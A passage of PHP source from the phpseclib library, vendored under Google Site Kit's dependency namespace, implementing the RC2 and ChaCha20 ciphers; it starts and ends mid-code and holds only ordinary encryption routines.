\pack(...$l); $this->key_length = \strlen($this->key); $this->changed = $this->nonIVChanged = \true; $this->setEngine(); } /** * Encrypts a message. * * Mostly a wrapper for \phpseclib3\Crypt\Common\SymmetricKey::encrypt, with some additional OpenSSL handling code * * @see self::decrypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { if ($this->engine == self::ENGINE_OPENSSL) { $temp = $this->key; $this->key = $this->orig_key; $result = parent::encrypt($plaintext); $this->key = $temp; return $result; } return parent::encrypt($plaintext); } /** * Decrypts a message. * * Mostly a wrapper for \phpseclib3\Crypt\Common\SymmetricKey::decrypt, with some additional OpenSSL handling code * * @see self::encrypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if ($this->engine == self::ENGINE_OPENSSL) { $temp = $this->key; $this->key = $this->orig_key; $result = parent::decrypt($ciphertext); $this->key = $temp; return $result; } return parent::decrypt($ciphertext); } /** * Encrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::encryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @param string $in * @return string */ protected function encryptBlock($in) { list($r0, $r1, $r2, $r3) = \array_values(\unpack('v*', $in)); $keys = $this->keys; $limit = 20; $actions = [$limit => 44, 44 => 64]; $j = 0; for (;;) { // Mixing round. $r0 = ($r0 + $keys[$j++] + (($r1 ^ $r2) & $r3 ^ $r1) & 0xffff) << 1; $r0 |= $r0 >> 16; $r1 = ($r1 + $keys[$j++] + (($r2 ^ $r3) & $r0 ^ $r2) & 0xffff) << 2; $r1 |= $r1 >> 16; $r2 = ($r2 + $keys[$j++] + (($r3 ^ $r0) & $r1 ^ $r3) & 0xffff) << 3; $r2 |= $r2 >> 16; $r3 = ($r3 + $keys[$j++] + (($r0 ^ $r1) & $r2 ^ $r0) & 0xffff) << 5; $r3 |= $r3 >> 16; if ($j === $limit) { if ($limit === 64) { break; } // Mashing round. $r0 += $keys[$r3 & 0x3f]; $r1 += $keys[$r0 & 0x3f]; $r2 += $keys[$r1 & 0x3f]; $r3 += $keys[$r2 & 0x3f]; $limit = $actions[$limit]; } } return \pack('vvvv', $r0, $r1, $r2, $r3); } /** * Decrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::decryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @param string $in * @return string */ protected function decryptBlock($in) { list($r0, $r1, $r2, $r3) = \array_values(\unpack('v*', $in)); $keys = $this->keys; $limit = 44; $actions = [$limit => 20, 20 => 0]; $j = 64; for (;;) { // R-mixing round. $r3 = ($r3 | $r3 << 16) >> 5; $r3 = $r3 - $keys[--$j] - (($r0 ^ $r1) & $r2 ^ $r0) & 0xffff; $r2 = ($r2 | $r2 << 16) >> 3; $r2 = $r2 - $keys[--$j] - (($r3 ^ $r0) & $r1 ^ $r3) & 0xffff; $r1 = ($r1 | $r1 << 16) >> 2; $r1 = $r1 - $keys[--$j] - (($r2 ^ $r3) & $r0 ^ $r2) & 0xffff; $r0 = ($r0 | $r0 << 16) >> 1; $r0 = $r0 - $keys[--$j] - (($r1 ^ $r2) & $r3 ^ $r1) & 0xffff; if ($j === $limit) { if ($limit === 0) { break; } // R-mashing round. $r3 = $r3 - $keys[$r2 & 0x3f] & 0xffff; $r2 = $r2 - $keys[$r1 & 0x3f] & 0xffff; $r1 = $r1 - $keys[$r0 & 0x3f] & 0xffff; $r0 = $r0 - $keys[$r3 & 0x3f] & 0xffff; $limit = $actions[$limit]; } } return \pack('vvvv', $r0, $r1, $r2, $r3); } /** * Creates the key schedule * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { if (!isset($this->key)) { $this->setKey(''); } // Key has already been expanded in \phpseclib3\Crypt\RC2::setKey(): // Only the first value must be altered. $l = \unpack('Ca/Cb/v*', $this->key); \array_unshift($l, self::$pitable[$l['a']] | $l['b'] << 8); unset($l['a']); unset($l['b']); $this->keys = $l; } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupInlineCrypt() */ protected function setupInlineCrypt() { // Init code for both, encrypt and decrypt. $init_crypt = '$keys = $this->keys;'; $keys = $this->keys; // $in is the current 8 bytes block which has to be en/decrypt $encrypt_block = $decrypt_block = ' $in = unpack("v4", $in); $r0 = $in[1]; $r1 = $in[2]; $r2 = $in[3]; $r3 = $in[4]; '; // Create code for encryption. $limit = 20; $actions = [$limit => 44, 44 => 64]; $j = 0; for (;;) { // Mixing round. $encrypt_block .= ' $r0 = (($r0 + ' . $keys[$j++] . ' + ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF) << 1; $r0 |= $r0 >> 16; $r1 = (($r1 + ' . $keys[$j++] . ' + ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF) << 2; $r1 |= $r1 >> 16; $r2 = (($r2 + ' . $keys[$j++] . ' + ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF) << 3; $r2 |= $r2 >> 16; $r3 = (($r3 + ' . $keys[$j++] . ' + ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF) << 5; $r3 |= $r3 >> 16;'; if ($j === $limit) { if ($limit === 64) { break; } // Mashing round. $encrypt_block .= ' $r0 += $keys[$r3 & 0x3F]; $r1 += $keys[$r0 & 0x3F]; $r2 += $keys[$r1 & 0x3F]; $r3 += $keys[$r2 & 0x3F];'; $limit = $actions[$limit]; } } $encrypt_block .= '$in = pack("v4", $r0, $r1, $r2, $r3);'; // Create code for decryption. $limit = 44; $actions = [$limit => 20, 20 => 0]; $j = 64; for (;;) { // R-mixing round. $decrypt_block .= ' $r3 = ($r3 | ($r3 << 16)) >> 5; $r3 = ($r3 - ' . $keys[--$j] . ' - ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF; $r2 = ($r2 | ($r2 << 16)) >> 3; $r2 = ($r2 - ' . $keys[--$j] . ' - ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF; $r1 = ($r1 | ($r1 << 16)) >> 2; $r1 = ($r1 - ' . $keys[--$j] . ' - ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF; $r0 = ($r0 | ($r0 << 16)) >> 1; $r0 = ($r0 - ' . $keys[--$j] . ' - ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF;'; if ($j === $limit) { if ($limit === 0) { break; } // R-mashing round. $decrypt_block .= ' $r3 = ($r3 - $keys[$r2 & 0x3F]) & 0xFFFF; $r2 = ($r2 - $keys[$r1 & 0x3F]) & 0xFFFF; $r1 = ($r1 - $keys[$r0 & 0x3F]) & 0xFFFF; $r0 = ($r0 - $keys[$r3 & 0x3F]) & 0xFFFF;'; $limit = $actions[$limit]; } } $decrypt_block .= '$in = pack("v4", $r0, $r1, $r2, $r3);'; // Creates the inline-crypt function $this->inline_crypt = $this->createInlineCryptFunction(['init_crypt' => $init_crypt, 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block]); } } <?php /** * Pure-PHP implementation of ChaCha20. * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException; /** * Pure-PHP implementation of ChaCha20. * * @author Jim Wigginton <terrafrost@php.net> */ class ChaCha20 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Salsa20 { /** * The OpenSSL specific name of the cipher * * @var string */ protected $cipher_name_openssl = 'chacha20'; /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { switch ($engine) { case self::ENGINE_LIBSODIUM: // PHP 7.2.0 (30 Nov 2017) added support for libsodium // we could probably make it so that if $this->counter == 0 then the first block would be done with either OpenSSL // or PHP and then subsequent blocks would then be done with libsodium but idk - it's not a high priority atm // we could also make it so that if $this->counter == 0 and $this->continuousBuffer then do the first string // with libsodium and subsequent strings with openssl or pure-PHP but again not a high priority return \function_exists('sodium_crypto_aead_chacha20poly1305_ietf_encrypt') && $this->key_length == 32 && ($this->usePoly1305 && !isset($this->poly1305Key) && $this->counter == 0 || $this->counter == 1) && !$this->continuousBuffer; case self::ENGINE_OPENSSL: // OpenSSL 1.1.0 (released 25 Aug 2016) added support for chacha20. // PHP didn't support OpenSSL 1.1.0 until 7.0.19 (11 May 2017) // if you attempt to provide openssl with a 128 bit key (as opposed to a 256 bit key) openssl will null // pad the key to 256 bits and still use the expansion constant for 256-bit keys. the fact that // openssl treats the IV as both the counter and nonce, however, let's us use openssl in continuous mode // whereas libsodium does not if ($this->key_length != 32) { return \false; } } return parent::isValidEngineHelper($engine); } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::crypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { $this->setup(); if ($this->engine == self::ENGINE_LIBSODIUM) { return $this->encrypt_with_libsodium($plaintext); } return parent::encrypt($plaintext); } /** * Decrypts a message. * * $this->decrypt($this->encrypt($plaintext)) == $this->encrypt($this->encrypt($plaintext)). * At least if the continuous buffer is disabled. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::crypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { $this->setup(); if ($this->engine == self::ENGINE_LIBSODIUM) { return $this->decrypt_with_libsodium($ciphertext); } return parent::decrypt($ciphertext); } /** * Encrypts a message with libsodium * * @see self::encrypt() * @param string $plaintext * @return string $text */ private function encrypt_with_libsodium($plaintext) { $params = [$plaintext, $this->aad, $this->nonce, $this->key]; $ciphertext = \strlen($this->nonce) == 8 ? \sodium_crypto_aead_chacha20poly1305_encrypt(...$params) : \sodium_crypto_aead_chacha20poly1305_ietf_encrypt(...$params); if (!$this->usePoly1305) { return \substr($ciphertext, 0, \strlen($plaintext)); } $newciphertext = \substr($ciphertext, 0, \strlen($plaintext)); $this->newtag = $this->usingGeneratedPoly1305Key && \strlen($this->nonce) == 12 ? \substr($ciphertext, \strlen($plaintext)) : $this->poly1305($newciphertext); return $newciphertext; } /** * Decrypts a message with libsodium * * @see self::decrypt() * @param string $ciphertext * @return string $text */ private function decrypt_with_libsodium($ciphertext) { $params = [$ciphertext, $this->aad, $this->nonce, $this->key]; if (isset($this->poly1305Key)) { if ($this->oldtag === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Authentication Tag has not been set'); } if ($this->usingGeneratedPoly1305Key && \strlen($this->nonce) == 12) { $plaintext = \sodium_crypto_aead_chacha20poly1305_ietf_decrypt(...$params); $this->oldtag = \false; if ($plaintext === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException('Derived authentication tag and supplied authentication tag do not match'); } return $plaintext; } $newtag = $this->poly1305($ciphertext); if ($this->oldtag != \substr($newtag, 0, \strlen($this->oldtag))) { $this->oldtag = \false; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException('Derived authentication tag and supplied authentication tag do not match'); } $this->oldtag = \false; } $plaintext = \strlen($this->nonce) == 8 ? \sodium_crypto_aead_chacha20poly1305_encrypt(...$params) : \sodium_crypto_aead_chacha20poly1305_ietf_encrypt(...$params); return \substr($plaintext, 0, \strlen($ciphertext)); } /** * Sets the nonce. * * @param string $nonce */ public function setNonce($nonce) { if (!\is_string($nonce)) { throw new \UnexpectedValueException('The nonce should be a string'); } /* from https://tools.ietf.org/html/rfc7539#page-7 "Note also that the original ChaCha had a 64-bit nonce and 64-bit block count. We have modified this here to be more consistent with recommendations in Section 3.2 of [RFC5116]." */ switch (\strlen($nonce)) { case 8: // 64 bits case 12: // 96 bits break; default: throw new \LengthException('Nonce of size ' . \strlen($nonce) . ' not supported by this algorithm. Only 64-bit nonces or 96-bit nonces are supported'); } $this->nonce = $nonce; $this->changed = \true; $this->setEngine(); } /** * Setup the self::ENGINE_INTERNAL $engine * * (re)init, if necessary, the internal cipher $engine * * _setup() will be called each time if $changed === true * typically this happens when using one or more of following public methods: * * - setKey() * * - setNonce() * * - First run of encrypt() / decrypt() with no init-settings * * @see self::setKey() * @see self::setNonce() * @see self::disableContinuousBuffer() */ protected function setup() { if (!$this->changed) { return; } $this->enbuffer = $this->debuffer = ['ciphertext' => '', 'counter' => $this->counter]; $this->changed = $this->nonIVChanged = \false; if ($this->nonce === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No nonce has been defined'); } if ($this->key === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No key has been defined'); } if ($this->usePoly1305 && !isset($this->poly1305Key)) { $this->usingGeneratedPoly1305Key = \true; if ($this->engine == self::ENGINE_LIBSODIUM) { return; } $this->createPoly1305Key(); } $key = $this->key; if (\strlen($key) == 16) { $constant = 'expand 16-byte k'; $key .= $key; } else { $constant = 'expand 32-byte k'; } $this->p1 = $constant . $key; $this->p2 = $this->nonce; if (\strlen($this->nonce) == 8) { $this->p2 = "\x00\x00\x00\x00" . $this->p2; } } /** * The quarterround function * * @param int $a * @param int $b * @param int $c * @param int $d */ protected static function quarterRound(&$a, &$b, &$c, &$d) { // in https://datatracker.ietf.org/doc/html/rfc7539#section-2.1 the addition, // xor'ing and rotation are all on the same line so i'm keeping it on the same // line here as well // @codingStandardsIgnoreStart $a += $b; $d = self::leftRotate(\intval($d) ^ \intval($a), 16); $c += $d; $b = self::leftRotate(\intval($b) ^ \intval($c), 12); $a += $b; $d = self::leftRotate(\intval($d) ^ \intval($a), 8); $c += $d; $b = self::leftRotate(\intval($b) ^ \intval($c), 7); // @codingStandardsIgnoreEnd } /** * The doubleround function * * @param int $x0 (by reference) * @param int $x1 (by reference) * @param int $x2 (by reference) * @param int $x3 (by reference) * @param int $x4 (by reference) * @param int $x5 (by reference) * @param int $x6 (by reference) * @param int $x7 (by reference) * @param int $x8 (by reference) * @param int $x9 (by reference) * @param int $x10 (by reference) * @param int $x11 (by reference) * @param int $x12 (by reference) * @param int $x13 (by reference) * @param int $x14 (by reference) * @param int $x15 (by reference) */ protected static function doubleRound(&$x0, &$x1, &$x2, &$x3, &$x4, &$x5, &$x6, &$x7, &$x8, &$x9, &$x10, &$x11, &$x12, &$x13, &$x14, &$x15) { // columnRound static::quarterRound($x0, $x4, $x8, $x12); static::quarterRound($x1, $x5, $x9, $x13); static::quarterRound($x2, $x6, $x10, $x14); static::quarterRound($x3, $x7, $x11, $x15); // rowRound static::quarterRound($x0, $x5, $x10, $x15); static::quarterRound($x1, $x6, $x11, $x12); static::quarterRound($x2, $x7, $x8, $x13); static::quarterRound($x3, $x4, $x9, $x14); } /** * The Salsa20 hash function function * * On my laptop this loop unrolled / function dereferenced version of parent::salsa20 encrypts 1mb of text in * 0.65s vs the 0.85s that it takes with the parent method. * * If we were free to assume that the host OS would always be 64-bits then the if condition in leftRotate could * be eliminated and we could knock this done to 0.60s. * * For comparison purposes, RC4 takes 0.16s and AES in CTR mode with the Eval engine takes 0.48s. * AES in CTR mode with the PHP engine takes 1.19s. Salsa20 / ChaCha20 do not benefit as much from the Eval * approach due to the fact that there are a lot less variables to de-reference, fewer loops to unroll, etc * * @param string $x */ protected static function salsa20($x) { list(, $x0, $x1, $x2, $x3, $x4, $x5, $x6, $x7, $x8, $x9, $x10, $x11, $x12, $x13, $x14, $x15) = \unpack('V*', $x); $z0 = $x0; $z1 = $x1; $z2 = $x2; $z3 = $x3; $z4 = $x4; $z5 = $x5; $z6 = $x6; $z7 = $x7; $z8 = $x8; $z9 = $x9; $z10 = $x10; $z11 = $x11; $z12 = $x12; $z13 = $x13; $z14 = $x14; $z15 = $x15; // @codingStandardsIgnoreStart // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 7); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 16); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 12); $x1 += $x5; $x13 = self::leftRotate(\intval($x13) ^ \intval($x1), 8); $x9 += $x13; $x5 = self::leftRotate(\intval($x5) ^ \intval($x9), 7); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 16); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 12); $x2 += $x6; $x14 = self::leftRotate(\intval($x14) ^ \intval($x2), 8); $x10 += $x14; $x6 = self::leftRotate(\intval($x6) ^ \intval($x10), 7); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 16); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 12); $x3 += $x7; $x15 = self::leftRotate(\intval($x15) ^ \intval($x3), 8); $x11 += $x15; $x7 = self::leftRotate(\intval($x7) ^ \intval($x11), 7); // rowRound $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 16); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 12); $x0 += $x5; $x15 = self::leftRotate(\intval($x15) ^ \intval($x0), 8); $x10 += $x15; $x5 = self::leftRotate(\intval($x5) ^ \intval($x10), 7); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 16); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 12); $x1 += $x6; $x12 = self::leftRotate(\intval($x12) ^ \intval($x1), 8); $x11 += $x12; $x6 = self::leftRotate(\intval($x6) ^ \intval($x11), 7); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 16); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 12); $x2 += $x7; $x13 = self::leftRotate(\intval($x13) ^ \intval($x2), 8); $x8 += $x13; $x7 = self::leftRotate(\intval($x7) ^ \intval($x8), 7); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 16); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 12); $x3 += $x4; $x14 = self::leftRotate(\intval($x14) ^ \intval($x3), 8); $x9 += $x14; $x4 = self::leftRotate(\intval($x4) ^ \intval($x9), 7); // columnRound $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 16); $x8 += $x12; $x4 = self::leftRotate(\intval($x4) ^ \intval($x8), 12); $x0 += $x4; $x12 = self::leftRotate(\intval($x12) ^ \intval($x0), 8); $x8 += $x12; 